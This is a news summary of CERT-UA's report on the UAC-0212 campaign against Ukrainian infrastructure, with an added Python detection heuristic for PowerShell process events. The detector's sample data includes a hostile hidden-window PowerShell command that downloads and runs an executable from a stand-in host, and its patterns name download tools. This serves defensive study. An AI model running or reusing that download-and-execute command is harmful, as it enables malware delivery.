UAC-0212 attack campaign against critical infrastructures in Ukraine
The Computer Emergency Response Team of Ukraine (CERT-UA) has reported a new attack campaign against the country's critical infrastructure, based on its own analysis of targeted attacks carried out between July 2024 and February 2025. The campaign has been linked to known Russian hacker groups such as Sandworm, APT44 and Seashell Blizzard. The attackers' main goal is to compromise the information and communication systems of Ukrainian critical infrastructure operators.
The most common initial-access method is to open a conversation with the targeted companies while impersonating potential customers. Once a certain level of trust has been established, the attackers send supposed "technical documentation" as a link to a PDF document. Through this link, the vulnerability CVE-2024-38213 is exploited so that the victim downloads a hidden LNK file that bypasses the web protection mechanisms of Windows systems. Once executed, this file triggers a PowerShell command that displays the PDF document while secretly downloading and installing malicious EXE/DLL executables on the victim's machine.
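The chain described above (LNK opened from Explorer, PowerShell showing a decoy PDF while fetching an EXE/DLL) leaves a recognisable pattern in process-creation telemetry. The following detection heuristic is an added example written for this page, not CERT-UA's own rule or tooling: it scores Sysmon-style process-creation records for the combination of signals the report describes. The sample events, the hidden-window flag and the `placeholder.invalid` host are constructed for the example and are not indicators from the report.

```python
import re

# Constructed process-creation records in the shape Sysmon Event ID 1 or EDR
# telemetry would provide. All values (PIDs, paths, host names) are invented
# for this example; they are not IoCs from the CERT-UA report.
SAMPLE_EVENTS = [
    {   # LNK launched from Explorer: decoy PDF shown, payload fetched and run
        "pid": 4120,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": (
            "powershell.exe -nop -w hidden -c "
            "\"Start-Process 'C:\\Users\\user\\Downloads\\technical_docs.pdf'; "
            "Invoke-WebRequest http://placeholder.invalid/update.exe -OutFile $env:TEMP\\update.exe; "
            "Start-Process $env:TEMP\\update.exe\""
        ),
    },
    {   # Benign: an administrator running a local maintenance script from Explorer
        "pid": 4188,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\rotate-logs.ps1",
    },
    {   # Benign: interactive PowerShell from a command prompt
        "pid": 4201,
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -c Get-ChildItem C:\\temp",
    },
]

# Each indicator maps to one element of the behaviour the report describes.
# The hidden-window flag is an assumption about how "secretly" is achieved.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_primitive": re.compile(
        r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
        re.I,
    ),
    "decoy_document": re.compile(r"\.pdf\b", re.I),
    # Executable referenced on the command line, ignoring the interpreter itself.
    "executable_drop": re.compile(r"(?<!powershell)\.(?:exe|dll)\b", re.I),
}


def score_event(event):
    """Return the list of indicator names that fire for a PowerShell process-creation event."""
    reasons = []
    if not event["image"].lower().endswith("powershell.exe"):
        return reasons
    # A double-clicked LNK is launched by Explorer, so Explorer as parent is one signal.
    if event["parent_image"].lower().endswith("explorer.exe"):
        reasons.append("parent_explorer")
    cmd = event["command_line"]
    for name, pattern in INDICATORS.items():
        if pattern.search(cmd):
            reasons.append(name)
    return reasons


def is_suspicious(reasons):
    """Require the core pair (download + executable) plus at least one supporting signal."""
    return ("download_primitive" in reasons
            and "executable_drop" in reasons
            and len(reasons) >= 3)


def find_suspicious(events):
    """Return (pid, reasons) for every event that meets the threshold."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if is_suspicious(reasons):
            hits.append((event["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(reasons)}")
```

The threshold deliberately demands the download primitive and the dropped executable together, since either alone is common in legitimate administration; the decoy-document and Explorer-parent signals then raise confidence that the PowerShell instance was started by a user opening a received "document". In production the same logic would be expressed as a SIEM or EDR rule over real Event ID 1 fields.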
To carry out these attacks, CERT-UA has identified the use of attack tools such as SECONDBEST, EMPIREPAST, SPARK and CROOKBAG. It also highlights the use of RSYNC to collect information persistently.
24/02/2025gbhackers.com